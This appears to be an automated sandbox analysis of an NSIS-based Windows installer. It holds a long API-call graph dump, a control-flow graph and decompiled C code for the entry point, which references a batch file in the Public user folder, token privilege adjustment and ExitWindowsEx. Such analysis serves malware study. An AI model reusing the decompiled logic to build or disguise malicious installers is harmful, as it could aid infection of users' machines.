5611->5610 5612 401c19 5613 402c15 17 API calls 5612->5613 5614 401c20 5613->5614 5615 402c15 17 API calls 5614->5615 5616 401c2d 5615->5616 5617 401c42 5616->5617 5618 402c37 17 API calls 5616->5618 5619 401c52 5617->5619 5620 402c37 17 API calls 5617->5620 5618->5617 5621 401ca9 5619->5621 5622 401c5d 5619->5622 5620->5619 5624 402c37 17 API calls 5621->5624 5623 402c15 17 API calls 5622->5623 5625 401c62 5623->5625 5626 401cae 5624->5626 5627 402c15 17 API calls 5625->5627 5628 402c37 17 API calls 5626->5628 5629 401c6e 5627->5629 5630 401cb7 FindWindowExW 5628->5630 5631 401c99 SendMessageW 5629->5631 5632 401c7b SendMessageTimeoutW 5629->5632 5633 401cd9 5630->5633 5631->5633 5632->5633 5634 402a9a SendMessageW 5635 402ab4 InvalidateRect 5634->5635 5636 402abf 5634->5636 5635->5636 5637 40281b 5638 402821 5637->5638 5639 402829 FindClose 5638->5639 5640 402abf 5638->5640 5639->5640 5641 40149e 5642 4022f1 5641->5642 5643 4014ac PostQuitMessage 5641->5643 5643->5642 5644 100010e1 5653 10001111 5644->5653 5645 100011d8 GlobalFree 5646 100012ba 2 API calls 5646->5653 5647 100011d3 5647->5645 5648 100011f8 GlobalFree 5648->5653 5649 10001272 2 API calls 5652 100011c4 GlobalFree 5649->5652 5650 10001164 GlobalAlloc 5650->5653 5651 100012e1 lstrcpyW 5651->5653 5652->5653 5653->5645 5653->5646 5653->5647 5653->5648 5653->5649 5653->5650 5653->5651 5653->5652 5661 4029a2 5662 402c15 17 API calls 5661->5662 5663 4029a8 5662->5663 5664 402885 5663->5664 5665 4029e8 5663->5665 5666 4029cf 5663->5666 5667 402a02 5665->5667 5668 4029f2 5665->5668 5669 4029d4 5666->5669 5674 4029e5 5666->5674 5671 40626e 17 API calls 5667->5671 5670 402c15 17 API calls 5668->5670 5675 40624c lstrcpynW 5669->5675 5670->5674 5671->5674 5674->5664 5676 406193 wsprintfW 5674->5676 5675->5664 5676->5664 4366 4015a3 4367 402c37 17 API calls 4366->4367 4368 4015aa SetFileAttributesW 4367->4368 4369 4015bc 4368->4369 5677 405224 5678 405234 5677->5678 5679 405248 5677->5679 5681 405291 5678->5681 5682 40523a 5678->5682 5680 405250 IsWindowVisible 5679->5680 5688 405267 5679->5688 5680->5681 5683 40525d 5680->5683 5684 405296 CallWindowProcW 5681->5684 5685 40422d SendMessageW 5682->5685 5690 404b7a SendMessageW 5683->5690 5687 405244 5684->5687 5685->5687 5688->5684 5695 404bfa 5688->5695 5691 404bd9 SendMessageW 5690->5691 5692 404b9d GetMessagePos ScreenToClient SendMessageW 5690->5692 5693 404bd1 5691->5693 5692->5693 5694 404bd6 5692->5694 5693->5688 5694->5691 5704 40624c lstrcpynW 5695->5704 5697 404c0d 5705 406193 wsprintfW 5697->5705 5699 404c17 5700 40140b 2 API calls 5699->5700 5701 404c20 5700->5701 5706 40624c lstrcpynW 5701->5706 5703 404c27 5703->5681 5704->5697 5705->5699 5706->5703 5707 4028a7 5708 402c37 17 API calls 5707->5708 5709 4028b5 5708->5709 5710 4028cb 5709->5710 5712 402c37 17 API calls 5709->5712 5711 405d19 2 API calls 5710->5711 5713 4028d1 5711->5713 5712->5710 5735 405d3e GetFileAttributesW CreateFileW 5713->5735 5715 4028de 5716 402981 5715->5716 5717 4028ea GlobalAlloc 5715->5717 5720 402989 DeleteFileW 5716->5720 5721 40299c 5716->5721 5718 402903 5717->5718 5719 402978 CloseHandle 5717->5719 5736 4032f5 SetFilePointer 5718->5736 5719->5716 5720->5721 5723 402909 5724 4032df ReadFile 5723->5724 5725 402912 GlobalAlloc 5724->5725 5726 402922 5725->5726 5727 402956 5725->5727 5729 4030fa 35 API calls 5726->5729 5728 405df0 WriteFile 5727->5728 5730 402962 GlobalFree 5728->5730 5734 40292f 5729->5734 5731 4030fa 35 API calls 5730->5731 5733 402975 5731->5733 5732 40294d GlobalFree 5732->5727 5733->5719 5734->5732 5735->5715 5736->5723 4552 40202c 4553 40203e 4552->4553 4554 4020f0 4552->4554 4555 402c37 17 API calls 4553->4555 4556 401423 24 API calls 4554->4556 4557 402045 4555->4557 4562 40224a 4556->4562 4558 402c37 17 API calls 4557->4558 4559 40204e 4558->4559 4560 402064 LoadLibraryExW 4559->4560 4561 402056 GetModuleHandleW 4559->4561 4560->4554 4563 402075 4560->4563 4561->4560 4561->4563 4575 406695 WideCharToMultiByte 4563->4575 4566 402086 4568 4020a5 4566->4568 4569 40208e 4566->4569 4567 4020bf 4570 4052b0 24 API calls 4567->4570 4578 10001759 4568->4578 4571 401423 24 API calls 4569->4571 4572 402096 4570->4572 4571->4572 4572->4562 4573 4020e2 FreeLibrary 4572->4573 4573->4562 4576 402080 4575->4576 4577 4066bf GetProcAddress 4575->4577 4576->4566 4576->4567 4577->4576 4579 10001789 4578->4579 4620 10001b18 4579->4620 4581 10001790 4582 100018a6 4581->4582 4583 100017a1 4581->4583 4584 100017a8 4581->4584 4582->4572 4664 10002286 4583->4664 4650 100022d0 4584->4650 4589 100017cd 4590 1000180c 4589->4590 4591 100017ee 4589->4591 4592 10001812 4590->4592 4593 1000184e 4590->4593 4677 100024a4 4591->4677 4598 100015b4 3 API calls 4592->4598 4600 100024a4 9 API calls 4593->4600 4594 100017d7 4594->4589 4674 10002b57 4594->4674 4596 100017be 4597 100017c4 4596->4597 4602 100017cf 4596->4602 4597->4589 4660 1000289c 4597->4660 4605 10001828 4598->4605 4606 10001840 4600->4606 4601 100017f4 4687 100015b4 4601->4687 4668 10002640 4602->4668 4609 100024a4 9 API calls 4605->4609 4611 10001895 4606->4611 4698 10002467 4606->4698 4608 100017d5 4608->4589 4609->4606 4611->4582 4614 1000189f GlobalFree 4611->4614 4614->4582 4617 10001881 4617->4611 4702 1000153d wsprintfW 4617->4702 4618 1000187a FreeLibrary 4618->4617 4705 1000121b GlobalAlloc 4620->4705 4622 10001b3c 4706 1000121b GlobalAlloc 4622->4706 4624 10001d7a GlobalFree GlobalFree GlobalFree 4626 10001d97 4624->4626 4636 10001de1 4624->4636 4625 10001b47 4625->4624 4629 10001c1d GlobalAlloc 4625->4629 4631 10001c68 lstrcpyW 4625->4631 4632 10001c86 GlobalFree 4625->4632 4635 10001c72 lstrcpyW 4625->4635 4625->4636 4638 10002048 4625->4638 4645 10001cc4 4625->4645 4646 10001f37 GlobalFree 4625->4646 4649 1000122c 2 API calls 4625->4649 4712 1000121b GlobalAlloc 4625->4712 4627 10001dac 4626->4627 4628 100020ee 4626->4628 4626->4636 4627->4636 4709 1000122c 4627->4709 4630 10002110 GetModuleHandleW 4628->4630 4628->4636 4629->4625 4633 10002121 LoadLibraryW 4630->4633 4634 10002136 4630->4634 4631->4635 4632->4625 4633->4634 4633->4636 4713 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte 4634->4713 4635->4625 4636->4581 4638->4636 4644 10002090 lstrcpyW 4638->4644 4639 10002195 lstrlenW 4643 100015ff 4 API calls 4639->4643 4641 10002148 4641->4636 4641->4639 4647 100021af 4643->4647 4644->4636 4645->4625 4707 1000158f GlobalSize GlobalAlloc 4645->4707 4646->4625 4647->4636 4649->4625 4653 100022e8 4650->4653 4651 1000122c GlobalAlloc lstrcpynW 4651->4653 4653->4651 4654 10002410 GlobalFree 4653->4654 4655 100023ba GlobalAlloc 4653->4655 4656 1000238f GlobalAlloc 4653->4656 4658 100023b8 4653->4658 4716 100012ba 4653->4716 4654->4653 4657 100017ae 4654->4657 4655->4658 4656->4658 4657->4589 4657->4594 4657->4596 4658->4654 4720 100025d4 4658->4720 4662 100028ae 4660->4662 4661 10002953 CreateFileA 4663 10002971 4661->4663 4662->4661 4663->4589 4665 10002296 4664->4665 4666 100017a7 4664->4666 4665->4666 4667 100022a8 GlobalAlloc 4665->4667 4666->4584 4667->4665 4671 1000265c 4668->4671 4669 100026c0 4672 100026c5 GlobalSize 4669->4672 4673 100026cf 4669->4673 4670 100026ad GlobalAlloc 4670->4673 4671->4669 4671->4670 4672->4673 4673->4608 4675 10002b62 4674->4675 4676 10002ba2 GlobalFree 4675->4676 4723 1000121b GlobalAlloc 4677->4723 4679 10002506 MultiByteToWideChar 4684 100024ae 4679->4684 4680 1000253c lstrcpynW 4680->4684 4681 1000254f wsprintfW 4681->4684 4682 1000256c GlobalFree 4682->4684 4683 100025a7 GlobalFree 4683->4601 4684->4679 4684->4680 4684->4681 4684->4682 4684->4683 4685 10001272 2 API calls 4684->4685 4724 100012e1 4684->4724 4685->4684 4728 1000121b GlobalAlloc 4687->4728 4689 100015ba 4690 100015c7 lstrcpyW 4689->4690 4692 100015e1 4689->4692 4693 100015fb 4690->4693 4692->4693 4694 100015e6 wsprintfW 4692->4694 4695 10001272 4693->4695 4694->4693 4696 100012b5 GlobalFree 4695->4696 4697 1000127b GlobalAlloc lstrcpynW 4695->4697 4696->4606 4697->4696 4699 10001861 4698->4699 4700 10002475 4698->4700 4699->4617 4699->4618 4700->4699 4701 10002491 GlobalFree 4700->4701 4701->4700 4703 10001272 2 API calls 4702->4703 4704 1000155e 4703->4704 4704->4611 4705->4622 4706->4625 4708 100015ad 4707->4708 4708->4645 4715 1000121b GlobalAlloc 4709->4715 4711 1000123b lstrcpynW 4711->4636 4712->4625 4714 1000163f GlobalFree 4713->4714 4714->4641 4715->4711 4717 100012c1 4716->4717 4718 1000122c 2 API calls 4717->4718 4719 100012df 4718->4719 4719->4653 4721 100025e2 VirtualAlloc 4720->4721 4722 10002638 4720->4722 4721->4722 4722->4658 4723->4684 4725 100012ea 4724->4725 4726 1000130c 4724->4726 4725->4726 4727 100012f0 lstrcpyW 4725->4727 4726->4684 4727->4726 4728->4689 5737 404c2c GetDlgItem GetDlgItem 5738 404c7e 7 API calls 5737->5738 5741 404e97 5737->5741 5739 404d21 DeleteObject 5738->5739 5740 404d14 SendMessageW 5738->5740 5742 404d2a 5739->5742 5740->5739 5748 404f7b 5741->5748 5756 404b7a 5 API calls 5741->5756 5768 404f08 5741->5768 5743 404d61 5742->5743 5745 40626e 17 API calls 5742->5745 5746 4041e1 18 API calls 5743->5746 5744 405027 5749 405031 SendMessageW 5744->5749 5755 405039 5744->5755 5750 404d43 SendMessageW SendMessageW 5745->5750 5747 404d75 5746->5747 5751 4041e1 18 API calls 5747->5751 5748->5744 5752 404fd4 SendMessageW 5748->5752 5780 404e8a 5748->5780 5749->5755 5750->5742 5769 404d83 5751->5769 5758 404fe9 SendMessageW 5752->5758 5752->5780 5753 404248 8 API calls 5759 40521d 5753->5759 5754 404f6d SendMessageW 5754->5748 5760 405052 5755->5760 5761 40504b ImageList_Destroy 5755->5761 5765 405062 5755->5765 5756->5768 5757 4051d1 5766 4051e3 ShowWindow GetDlgItem ShowWindow 5757->5766 5757->5780 5764 404ffc 5758->5764 5762 40505b GlobalFree 5760->5762 5760->5765 5761->5760 5762->5765 5763 404e58 GetWindowLongW SetWindowLongW 5767 404e71 5763->5767 5774 40500d SendMessageW 5764->5774 5765->5757 5779 404bfa 4 API calls 5765->5779 5784 40509d 5765->5784 5766->5780 5770 404e77 ShowWindow 5767->5770 5771 404e8f 5767->5771 5768->5748 5768->5754 5769->5763 5773 404dd3 SendMessageW 5769->5773 5775 404e52 5769->5775 5777 404e20 SendMessageW 5769->5777 5778 404e0f SendMessageW 5769->5778 5788 404216 SendMessageW 5770->5788 5789 404216 SendMessageW 5771->5789 5773->5769 5774->5744 5775->5763 5775->5767 5777->5769 5778->5769 5779->5784 5780->5753 5781 4051a7 InvalidateRect 5781->5757 5782 4051bd 5781->5782 5790 404b35 5782->5790 5783 4050cb SendMessageW 5787 4050e1 5783->5787 5784->5783 5784->5787 5786 405155 SendMessageW SendMessageW 5786->5787 5787->5781 5787->5786 5788->5780 5789->5741 5793 404a6c 5790->5793 5792 404b4a 5792->5757 5794 404a85 5793->5794 5795 40626e 17 API calls 5794->5795 5796 404ae9 5795->5796 5797 40626e 17 API calls 5796->5797 5798 404af4 5797->5798 5799 40626e 17 API calls 5798->5799 5800 404b0a lstrlenW wsprintfW SetDlgItemTextW 5799->5800 5800->5792 5801 402a2f 5802 402c15 17 API calls 5801->5802 5803 402a35 5802->5803 5804 402a6c 5803->5804 5806 402885 5803->5806 5807 402a47 5803->5807 5805 40626e 17 API calls 5804->5805 5804->5806 5805->5806 5807->5806 5809 406193 wsprintfW 5807->5809 5809->5806 5810 40432f lstrlenW 5811 404350 WideCharToMultiByte 5810->5811 5812 40434e 5810->5812 5812->5811 5813 401a30 5814 402c37 17 API calls 5813->5814 5815 401a39 ExpandEnvironmentStringsW 5814->5815 5816 401a4d 5815->5816 5818 401a60 5815->5818 5817 401a52 lstrcmpW 5816->5817 5816->5818 5817->5818 5819 4046b0 5820 4046dc 5819->5820 5821 4046ed 5819->5821 5880 405892 GetDlgItemTextW 5820->5880 5823 4046f9 GetDlgItem 5821->5823 5854 404758 5821->5854 5824 40470d 5823->5824 5827 404721 SetWindowTextW 5824->5827 5830 405bc8 4 API calls 5824->5830 5825 4046e7 5826 4064e0 5 API calls 5825->5826 5826->5821 5831 4041e1 18 API calls 5827->5831 5829 404248 8 API calls 5834 4049ff 5829->5834 5835 404717 5830->5835 5836 40473d 5831->5836 5832 40626e 17 API calls 5837 4047cc SHBrowseForFolderW 5832->5837 5833 40486c 5838 405c25 18 API calls 5833->5838 5835->5827 5843 405b1d 3 API calls 5835->5843 5839 4041e1 18 API calls 5836->5839 5840 4047e4 CoTaskMemFree 5837->5840 5841 40483c 5837->5841 5842 404872 5838->5842 5844 40474b 5839->5844 5845 405b1d 3 API calls 5840->5845 5878 4049eb 5841->5878 5882 405892 GetDlgItemTextW 5841->5882 5883 40624c lstrcpynW 5842->5883 5843->5827 5881 404216 SendMessageW 5844->5881 5847 4047f1 5845->5847 5850 404828 SetDlgItemTextW 5847->5850 5855 40626e 17 API calls 5847->5855 5849 404751 5852 406626 5 API calls 5849->5852 5850->5841 5851 404889 5853 406626 5 API calls 5851->5853 5852->5854 5861 404890 5853->5861 5854->5832 5854->5841 5854->5878 5856 404810 lstrcmpiW 5855->5856 5856->5850 5858 404821 lstrcatW 5856->5858 5857 4048d1 5884 40624c lstrcpynW 5857->5884 5858->5850 5860 4048d8 5862 405bc8 4 API calls 5860->5862 5861->5857 5866 405b69 2 API calls 5861->5866 5867 404929 5861->5867 5863 4048de GetDiskFreeSpaceW 5862->5863 5865 404902 MulDiv 5863->5865 5863->5867 5865->5867 5866->5861 5868 40499a 5867->5868 5870 404b35 20 API calls 5867->5870 5869 4049bd 5868->5869 5871 40140b 2 API calls 5868->5871 5885 404203 KiUserCallbackDispatcher 5869->5885 5872 404987 5870->5872 5871->5869 5874 40499c SetDlgItemTextW 5872->5874 5875 40498c 5872->5875 5874->5868 5876 404a6c 20 API calls 5875->5876 5876->5868 5877 4049d9 5877->5878 5879 404609 SendMessageW 5877->5879 5878->5829 5879->5878 5880->5825 5881->5849 5882->5833 5883->5851 5884->5860 5885->5877 5891 401db3 GetDC 5892 402c15 17 API calls 5891->5892 5893 401dc5 GetDeviceCaps MulDiv ReleaseDC 5892->5893 5894 402c15 17 API calls 5893->5894 5895 401df6 5894->5895 5896 40626e 17 API calls 5895->5896 5897 401e33 CreateFontIndirectW 5896->5897 5898 40258c 5897->5898 5899 402835 5900 40283d 5899->5900 5901 402841 FindNextFileW 5900->5901 5902 402853 5900->5902 5901->5902 5903 4029e0 5902->5903 5905 40624c lstrcpynW 5902->5905 5905->5903 5906 401735 5907 402c37 17 API calls 5906->5907 5908 40173c SearchPathW 5907->5908 5909 401757 5908->5909 5910 4029e0 5908->5910 5909->5910 5912 40624c lstrcpynW 5909->5912 5912->5910 5913 10002a77 5914 10002a8f 5913->5914 5915 1000158f 2 API calls 5914->5915 5916 10002aaa 5915->5916 5917 4014b8 5918 4014be 5917->5918 5919 401389 2 API calls 5918->5919 5920 4014c6 5919->5920 4890 40333d SetErrorMode GetVersion 4891 40337c 4890->4891 4892 403382 4890->4892 4893 406626 5 API calls 4891->4893 4894 4065b6 3 API calls 4892->4894 4893->4892 4895 403398 lstrlenA 4894->4895 4895->4892 4896 4033a8 4895->4896 4897 406626 5 API calls 4896->4897 4898 4033af 4897->4898 4899 406626 5 API calls 4898->4899 4900 4033b6 4899->4900 4901 406626 5 API calls 4900->4901 4902 4033c2 #17 OleInitialize SHGetFileInfoW 4901->4902 4981 40624c lstrcpynW 4902->4981 4905 40340e GetCommandLineW 4982 40624c lstrcpynW 4905->4982 4907 403420 GetModuleHandleW 4908 403438 4907->4908 4909 405b4a CharNextW 4908->4909 4910 403447 CharNextW 4909->4910 4911 403571 GetTempPathW 4910->4911 4913 403460 4910->4913 4983 40330c 4911->4983 4913->4913 4918 405b4a CharNextW 4913->4918 4926 40355c 4913->4926 4928 40355a 4913->4928 4914 403589 4915 4035e3 DeleteFileW 4914->4915 4916 40358d GetWindowsDirectoryW lstrcatW 4914->4916 4993 402ec1 GetTickCount GetModuleFileNameW 4915->4993 4917 40330c 12 API calls 4916->4917 4920 4035a9 4917->4920 4918->4913 4920->4915 4922 4035ad GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4920->4922 4921 4035f7 4923 4036aa 4921->4923 4924 40369a 4921->4924 4929 405b4a CharNextW 4921->4929 4927 40330c 12 API calls 4922->4927 5080 403880 4923->5080 5021 40395a 4924->5021 5077 40624c lstrcpynW 4926->5077 4933 4035db 4927->4933 4928->4911 4945 403616 4929->4945 4933->4915 4933->4923 4934 4037e4 4937 403868 ExitProcess 4934->4937 4938 4037ec GetCurrentProcess OpenProcessToken 4934->4938 4935 4036c4 4936 4058ae MessageBoxIndirectW 4935->4936 4942 4036d2 ExitProcess 4936->4942 4943 403804 LookupPrivilegeValueW AdjustTokenPrivileges 4938->4943 4944 403838 4938->4944 4940 403674 4946 405c25 18 API calls 4940->4946 4941 4036da 4947 405819 5 API calls 4941->4947 4943->4944 4948 406626 5 API calls 4944->4948 4945->4940 4945->4941 4950 403680 4946->4950 4951 4036df lstrcatW 4947->4951 4949 40383f 4948->4949 4952 403854 ExitWindowsEx 4949->4952 4955 403861 4949->4955 4950->4923 5078 40624c lstrcpynW 4950->5078 4953 4036f0 lstrcatW 4951->4953 4954 4036fb lstrcatW lstrcmpiW 4951->4954 4952->4937 4952->4955 4953->4954 4954->4923 4957 403717 4954->4957 4960 40140b 2 API calls 4955->4960 4958 403723 4957->4958 4959 40371c 4957->4959 4963 4057fc 2 API calls 4958->4963 4962 40577f 4 API calls 4959->4962 4960->4937 4961 40368f 5079 40624c lstrcpynW 4961->5079 4965 403721 4962->4965 4966 403728 SetCurrentDirectoryW 4963->4966 4965->4966 4967 403743 4966->4967 4968 403738 4966->4968 5088 40624c lstrcpynW 4967->5088 5087 40624c lstrcpynW 4968->5087 4971 40626e 17 API calls 4972 403782 DeleteFileW 4971->4972 4973 40378f CopyFileW 4972->4973 4978 403751 4972->4978 4973->4978 4974 4037d8 4976 406012 36 API calls 4974->4976 4975 406012 36 API calls 4975->4978 4976->4923 4977 40626e 17 API calls 4977->4978 4978->4971 4978->4974 4978->4975 4978->4977 4979 405831 2 API calls 4978->4979 4980 4037c3 CloseHandle 4978->4980 4979->4978 4980->4978 4981->4905 4982->4907 4984 4064e0 5 API calls 4983->4984 4985 403318 4984->4985 4986 403322 4985->4986 4987 405b1d 3 API calls 4985->4987 4986->4914 4988 40332a 4987->4988 4989 4057fc 2 API calls 4988->4989 4990 403330 4989->4990 4991 405d6d 2 API calls 4990->4991 4992 40333b 4991->4992 4992->4914 5089 405d3e GetFileAttributesW CreateFileW 4993->5089 4995 402f01 5020 402f11 4995->5020 5090 40624c lstrcpynW 4995->5090 4997 402f27 4998 405b69 2 API calls 4997->4998 4999 402f2d 4998->4999 5091 40624c lstrcpynW 4999->5091 5001 402f38 GetFileSize 5002 403034 5001->5002 5019 402f4f 5001->5019 5092 402e5d 5002->5092 5004 40303d 5006 40306d GlobalAlloc 5004->5006 5004->5020 5104 4032f5 SetFilePointer 5004->5104 5005 4032df ReadFile 5005->5019 5103 4032f5 SetFilePointer 5006->5103 5008 4030a0 5011 402e5d 6 API calls 5008->5011 5010 403088 5013 4030fa 35 API calls 5010->5013 5011->5020 5012 403056 5014 4032df ReadFile 5012->5014 5017 403094 5013->5017 5015 403061 5014->5015 5015->5006 5015->5020 5016 402e5d 6 API calls 5016->5019 5017->5017 5018 4030d1 SetFilePointer 5017->5018 5017->5020 5018->5020 5019->5002 5019->5005 5019->5008 5019->5016 5019->5020 5020->4921 5022 406626 5 API calls 5021->5022 5023 40396e 5022->5023 5024 403974 5023->5024 5025 403986 5023->5025 5113 406193 wsprintfW 5024->5113 5026 40611a 3 API calls 5025->5026 5027 4039b6 5026->5027 5029 4039d5 lstrcatW 5027->5029 5031 40611a 3 API calls 5027->5031 5030 403984 5029->5030 5105 403c30 5030->5105 5031->5029 5034 405c25 18 API calls 5035 403a07 5034->5035 5036 403a9b 5035->5036 5038 40611a 3 API calls 5035->5038 5037 405c25 18 API calls 5036->5037 5039 403aa1 5037->5039 5040 403a39 5038->5040 5041 403ab1 LoadImageW 5039->5041 5042 40626e 17 API calls 5039->5042 5040->5036 5045 403a5a lstrlenW 5040->5045 5049 405b4a CharNextW 5040->5049 5043 403b57 5041->5043 5044 403ad8 RegisterClassW 5041->5044 5042->5041 5048 40140b 2 API calls 5043->5048 5046 403b61 5044->5046 5047 403b0e SystemParametersInfoW CreateWindowExW 5044->5047 5050 403a68 lstrcmpiW 5045->5050 5051 403a8e 5045->5051 5046->4923 5047->5043 5052 403b5d 5048->5052 5054 403a57 5049->5054 5050->5051 5055 403a78 GetFileAttributesW 5050->5055 5053 405b1d 3 API calls 5051->5053 5052->5046 5056 403c30 18 API calls 5052->5056 5057 403a94 5053->5057 5054->5045 5058 403a84 5055->5058 5059 403b6e 5056->5059 5114 40624c lstrcpynW 5057->5114 5058->5051 5061 405b69 2 API calls 5058->5061 5062 403b7a ShowWindow 5059->5062 5063 403bfd 5059->5063 5061->5051 5065 4065b6 3 API calls 5062->5065 5064 405383 5 API calls 5063->5064 5066 403c03 5064->5066 5067 403b92 5065->5067 5068 403c07 5066->5068 5069 403c1f 5066->5069 5070 403ba0 GetClassInfoW 5067->5070 5072 4065b6 3 API calls 5067->5072 5068->5046 5075 40140b 2 API calls 5068->5075 5071 40140b 2 API calls 5069->5071 5073 403bb4 GetClassInfoW RegisterClassW 5070->5073 5074 403bca DialogBoxParamW 5070->5074 5071->5046 5072->5070 5073->5074 5076 40140b 2 API calls 5074->5076 5075->5046 5076->5046 5077->4928 5078->4961 5079->4924 5081 403898 5080->5081 5082 40388a CloseHandle 5080->5082 5116 4038c5 5081->5116 5082->5081 5085 40595a 67 API calls 5086 4036b3 OleUninitialize 5085->5086 5086->4934 5086->4935 5087->4967 5088->4978 5089->4995 5090->4997 5091->5001 5093 402e66 5092->5093 5094 402e7e 5092->5094 5095 402e76 5093->5095 5096 402e6f DestroyWindow 5093->5096 5097 402e86 5094->5097 5098 402e8e GetTickCount 5094->5098 5095->5004 5096->5095 5099 406662 2 API calls 5097->5099 5100 402e9c CreateDialogParamW ShowWindow 5098->5100 5101 402ebf 5098->5101 5102 402e8c 5099->5102 5100->5101 5101->5004 5102->5004 5103->5010 5104->5012 5106 403c44 5105->5106 5115 406193 wsprintfW 5106->5115 5108 403cb5 5109 403ce9 18 API calls 5108->5109 5111 403cba 5109->5111 5110 4039e5 5110->5034 5111->5110 5112 40626e 17 API calls 5111->5112 5112->5111 5113->5030 5114->5036 5115->5108 5117 4038d3 5116->5117 5118 4038d8 FreeLibrary GlobalFree 5117->5118 5119 40389d 5117->5119 5118->5118 5118->5119 5119->5085

                                                        Executed Functions

                                                        Function 0040333D Relevance: 86.2, APIs: 33, Strings: 16, Instructions: 412stringfilecomCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 40333d-40337a SetErrorMode GetVersion 1 40337c-403384 call 406626 0->1 2 40338d 0->2 1->2 7 403386 1->7 3 403392-4033a6 call 4065b6 lstrlenA 2->3 9 4033a8-4033c4 call 406626 * 3 3->9 7->2 16 4033d5-403436 #17 OleInitialize SHGetFileInfoW call 40624c GetCommandLineW call 40624c GetModuleHandleW 9->16 17 4033c6-4033cc 9->17 24 403440-40345a call 405b4a CharNextW 16->24 25 403438-40343f 16->25 17->16 21 4033ce 17->21 21->16 28 403460-403466 24->28 29 403571-40358b GetTempPathW call 40330c 24->29 25->24 31 403468-40346d 28->31 32 40346f-403473 28->32 36 4035e3-4035fd DeleteFileW call 402ec1 29->36 37 40358d-4035ab GetWindowsDirectoryW lstrcatW call 40330c 29->37 31->31 31->32 34 403475-403479 32->34 35 40347a-40347e 32->35 34->35 38 403484-40348a 35->38 39 40353d-40354a call 405b4a 35->39 57 403603-403609 36->57 58 4036ae-4036be call 403880 OleUninitialize 36->58 37->36 54 4035ad-4035dd GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40330c 37->54 40 4034a5-4034de 38->40 41 40348c-403494 38->41 55 40354c-40354d 39->55 56 40354e-403554 39->56 47 4034e0-4034e5 40->47 48 4034fb-403535 40->48 45 403496-403499 41->45 46 40349b 41->46 45->40 45->46 46->40 47->48 52 4034e7-4034ef 47->52 48->39 53 403537-40353b 48->53 62 4034f1-4034f4 52->62 63 4034f6 52->63 53->39 64 40355c-40356a call 40624c 53->64 54->36 54->58 55->56 56->28 66 40355a 56->66 59 40369e-4036a5 call 40395a 57->59 60 40360f-40361a call 405b4a 57->60 75 4037e4-4037ea 58->75 76 4036c4-4036d4 call 4058ae ExitProcess 58->76 74 4036aa 59->74 77 403668-403672 60->77 78 40361c-403651 60->78 62->48 62->63 63->48 67 40356f 64->67 66->67 67->29 74->58 80 403868-403870 75->80 81 4037ec-403802 GetCurrentProcess OpenProcessToken 75->81 85 403674-403682 call 405c25 77->85 86 4036da-4036ee call 405819 lstrcatW 77->86 82 403653-403657 78->82 83 403872 80->83 84 403876-40387a ExitProcess 80->84 88 403804-403832 LookupPrivilegeValueW AdjustTokenPrivileges 81->88 89 403838-403846 call 406626 81->89 90 403660-403664 82->90 91 403659-40365e 82->91 83->84 85->58 101 403684-40369a call 40624c * 2 85->101 102 4036f0-4036f6 lstrcatW 86->102 103 4036fb-403715 lstrcatW lstrcmpiW 86->103 88->89 99 403854-40385f ExitWindowsEx 89->99 100 403848-403852 89->100 90->82 96 403666 90->96 91->90 91->96 96->77 99->80 104 403861-403863 call 40140b 99->104 100->99 100->104 101->59 102->103 103->58 106 403717-40371a 103->106 104->80 107 403723 call 4057fc 106->107 108 40371c-403721 call 40577f 106->108 117 403728-403736 SetCurrentDirectoryW 107->117 108->117 118 403743-40376c call 40624c 117->118 119 403738-40373e call 40624c 117->119 123 403771-40378d call 40626e DeleteFileW 118->123 119->118 126 4037ce-4037d6 123->126 127 40378f-40379f CopyFileW 123->127 126->123 128 4037d8-4037df call 406012 126->128 127->126 129 4037a1-4037c1 call 406012 call 40626e call 405831 127->129 128->58 129->126 138 4037c3-4037ca CloseHandle 129->138 138->126
                                                        C-Code - Quality: 81%
                                                        			_entry_() {
				signed int _t51;
				intOrPtr* _t56;
				WCHAR* _t60;
				char* _t63;
				void* _t66;
				void* _t68;
				int _t70;
				int _t72;
				int _t75;
				intOrPtr* _t76;
				int _t77;
				int _t79;
				void* _t103;
				signed int _t120;
				void* _t123;
				void* _t128;
				intOrPtr _t147;
				intOrPtr _t148;
				intOrPtr* _t149;
				int _t151;
				void* _t154;
				int _t155;
				signed int _t159;
				signed int _t164;
				signed int _t169;
				void* _t171;
				WCHAR* _t172;
				signed int _t175;
				signed int _t178;
				CHAR* _t179;
				void* _t182;
				int* _t184;
				void* _t192;
				char* _t193;
				void* _t196;
				void* _t197;
				void* _t243;

				_t171 = 0x20;
				_t151 = 0;
				 *(_t197 + 0x14) = 0;
				 *(_t197 + 0x10) = L"Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t197 + 0x1c) = 0;
				SetErrorMode(0x8001); // executed
				_t51 = GetVersion() & 0xbfffffff;
				 *0x42a20c = _t51;
				if(_t51 != 6) {
					_t149 = E00406626(0);
					if(_t149 != 0) {
						 *_t149(0xc00);
					}
				}
				_t179 = "UXTHEME";
				goto L4;
				L8:
				__imp__#17(_t192);
				__imp__OleInitialize(_t151); // executed
				 *0x42a2d8 = _t56;
				SHGetFileInfoW(0x4216a8, _t151, _t197 + 0x34, 0x2b4, _t151); // executed
				E0040624C(0x429200, L"NSIS Error");
				_t60 = GetCommandLineW();
				_t193 = L"\"C:\\Users\\Public\\wusb.bat\" ";
				E0040624C(_t193, _t60);
				 *0x42a200 = GetModuleHandleW(_t151);
				_t63 = _t193;
				if(L"\"C:\\Users\\Public\\wusb.bat\" " == 0x22) {
					_t63 =  &M00435002;
					_t171 = 0x22;
				}
				_t155 = CharNextW(E00405B4A(_t63, _t171));
				 *(_t197 + 0x18) = _t155;
				_t66 =  *_t155;
				if(_t66 == _t151) {
					L33:
					_t172 = L"C:\\Users\\alfons\\AppData\\Local\\Temp\\";
					GetTempPathW(0x400, _t172);
					_t68 = E0040330C(_t155, 0);
					_t225 = _t68;
					if(_t68 != 0) {
						L36:
						DeleteFileW(L"1033"); // executed
						_t70 = E00402EC1(_t227,  *(_t197 + 0x1c)); // executed
						 *(_t197 + 0x10) = _t70;
						if(_t70 != _t151) {
							L48:
							E00403880();
							__imp__OleUninitialize();
							_t239 =  *(_t197 + 0x10) - _t151;
							if( *(_t197 + 0x10) == _t151) {
								__eflags =  *0x42a2b4 - _t151;
								if( *0x42a2b4 == _t151) {
									L72:
									_t72 =  *0x42a2cc;
